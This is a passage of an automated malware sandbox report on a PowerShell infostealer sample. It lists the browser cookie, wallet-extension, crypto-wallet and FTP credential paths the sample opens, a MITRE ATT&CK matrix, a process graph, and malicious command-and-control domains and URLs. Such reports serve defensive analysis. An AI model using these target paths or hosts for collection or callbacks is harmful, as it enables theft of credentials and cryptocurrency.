                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                111
                Process Injection
                11
                Masquerading
                2
                OS Credential Dumping
                131
                Security Software Discovery
                Remote Services1
                Email Collection
                21
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                131
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts3
                PowerShell
                Logon Script (Windows)Logon Script (Windows)111
                Process Injection
                Security Account Manager131
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares41
                Data from Local System
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information
                NTDS1
                Application Window Discovery
                Distributed Component Object Model2
                Clipboard Data
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information
                LSA Secrets12
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing
                Cached Domain Credentials32
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580648 Sample: 00000.ps1 Startdate: 25/12/2024 Architecture: WINDOWS Score: 100 39 hushedocenahu.click 2->39 41 dma.sportstalk-musiclover.com 2->41 43 scrutinycheck.cash 2->43 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 11 other signatures 2->67 10 powershell.exe 11 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 71 Suspicious powershell command line found 10->71 73 Found many strings related to Crypto-Wallets (likely being stolen) 10->73 75 Bypasses PowerShell execution policy 10->75 16 mshta.exe 17 10->16         started        20 conhost.exe 10->20         started        47 127.0.0.1 unknown unknown 13->47 signatures6 process7 dnsIp8 37 scrutinycheck.cash 104.21.38.253, 443, 49730 CLOUDFLARENETUS United States 16->37 59 Suspicious powershell command line found 16->59 22 powershell.exe 18 16->22         started        signatures9 process10 signatures11 69 Suspicious powershell command line found 22->69 25 powershell.exe 15 16 22->25         started        29 conhost.exe 22->29         started        process12 dnsIp13 45 dma.sportstalk-musiclover.com 104.21.16.1, 443, 49734 CLOUDFLARENETUS United States 25->45 77 Found suspicious powershell code related to unpacking or dynamic code loading 25->77 79 Injects a PE file into a foreign processes 25->79 31 powershell.exe 25->31         started        35 conhost.exe 25->35         started        signatures14 process15 dnsIp16 49 hushedocenahu.click 104.21.112.1, 443, 49823, 49825 CLOUDFLARENETUS United States 31->49 51 Query firmware table information (likely to detect VMs) 31->51 53 Found many strings related to Crypto-Wallets (likely being stolen) 31->53 55 Tries to harvest and steal ftp login credentials 31->55 57 2 other signatures 31->57 signatures17

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                00000.ps10%VirustotalBrowse
                00000.ps10%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://hushedocenahu.click/bm0%Avira URL Cloudsafe
                https://hushedocenahu.click:443/api50%Avira URL Cloudsafe
                https://hushedocenahu.click/apiB=0%Avira URL Cloudsafe
                https://hushedocenahu.click/0%Avira URL Cloudsafe
                https://hushedocenahu.click/apid=:c0%Avira URL Cloudsafe
                https://dma.sportstalk-musiclover.com0%Avira URL Cloudsafe
                https://hushedocenahu.click:443/api0%Avira URL Cloudsafe
                https://hushedocenahu.click/api:6x0%Avira URL Cloudsafe
                https://hushedocenahu.click:443/apiA0%Avira URL Cloudsafe
                https://dma.sportstalk-musiclover.com/singl7.pst0%Avira URL Cloudsafe
                https://hushedocenahu.click/bu0%Avira URL Cloudsafe
                https://hushedocenahu.click/o0%Avira URL Cloudsafe
                https://hushedocenahu.click:443/apiK0%Avira URL Cloudsafe
                https://hushedocenahu.click/apib0%Avira URL Cloudsafe
                https://hushedocenahu.click/api0%Avira URL Cloudsafe
                hushedocenahu.click0%Avira URL Cloudsafe
                https://hushedocenahu.click/pi0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                hushedocenahu.click
                104.21.112.1
                truetrue
                  unknown
                  dma.sportstalk-musiclover.com
                  104.21.16.1
                  truetrue
                    unknown
                    scrutinycheck.cash
                    104.21.38.253
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      necklacebudi.latfalse
                        high
                        aspecteirs.latfalse
                          high
                          https://scrutinycheck.cash/singl7.mp4false
                            high
                            sustainskelet.latfalse
                              high
                              crosshuaht.latfalse
                                high
                                rapeflowwj.latfalse
                                  high
                                  https://dma.sportstalk-musiclover.com/singl7.psttrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  energyaffai.latfalse
                                    high
                                    https://hushedocenahu.click/apitrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    hushedocenahu.clicktrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    grannyejh.latfalse
                                      high
                                      discokeyus.latfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://scrutinycheck.cash/singl7.mp40w&mshta.exe, 00000002.00000002.1822579001.000001FD98B76000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://hushedocenahu.click:443/apipowershell.exe, 0000000C.00000002.2800133767.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://scrutinycheck.cash/singl7.mp4cmshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://g.live.com/odclientsettings/ProdV2.C:edb.log.3.drfalse
                                                high
                                                https://aka.ms/pscore6powershell.exe, 00000000.00000002.1707001307.0000026C0A68A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://scrutinycheck.cash/singl7.mp4iqenvwhmshta.exe, 00000002.00000002.1824253687.000002059ADC1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1801686518.000002059ADBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1813735544.000002059ADBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1812901512.000002059ADBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1814020931.000002059ADC0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://scrutinycheck.cash/singl7.mp4omshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://scrutinycheck.cash/singl7.mp4mmshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://hushedocenahu.click/powershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2800133767.0000000003447000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2803637158.00000000034A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://scrutinycheck.cash/singl7.mp4(Omshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
                                                            high
                                                            https://hushedocenahu.click:443/api5powershell.exe, 0000000C.00000002.2800133767.0000000003423000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://hushedocenahu.click/api:6xpowershell.exe, 0000000C.00000002.2803637158.000000000349D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://scrutinycheck.cash/singl7.mp4Windowsmshta.exe, 00000002.00000002.1822735275.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1803612223.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://scrutinycheck.cash/singl7.mp4ZOmshta.exe, 00000002.00000003.1803612223.000001FD98B8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.1822735275.000001FD98B8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://g.live.com/odclientsettings/ProdV2edb.log.3.drfalse
                                                                  high
                                                                  https://scrutinycheck.cash/Pmshta.exe, 00000002.00000002.1822900003.000001FD98C02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1818296198.000001FD98C01000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1802308587.000001FD98C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://scrutinycheck.cash/singl7.mp4:6mshta.exe, 00000002.00000002.1822735275.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.1803612223.000001FD98BC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contoso.com/powershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1788739596.0000029766D1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1764165134.00000297587FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1788739596.0000029766E54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2611936982.00000000062FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://hushedocenahu.click/bmpowershell.exe, 0000000C.00000002.2800133767.0000000003438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://dma.sportstalk-musiclover.compowershell.exe, 00000004.00000002.1764165134.0000029757A75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2611936982.00000000053E7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://scrutinycheck.cash/singl7.mp4BROWSER_APP_ymshta.exe, 00000002.00000002.1823159169.000001FD98D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1707001307.0000026C0A641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1764165134.0000029756CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2611936982.0000000005291000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000003.00000003.1732763715.0000029795EB2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                                                                                high
                                                                                https://hushedocenahu.click/apid=:cpowershell.exe, 0000000C.00000002.2804009352.00000000034AB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
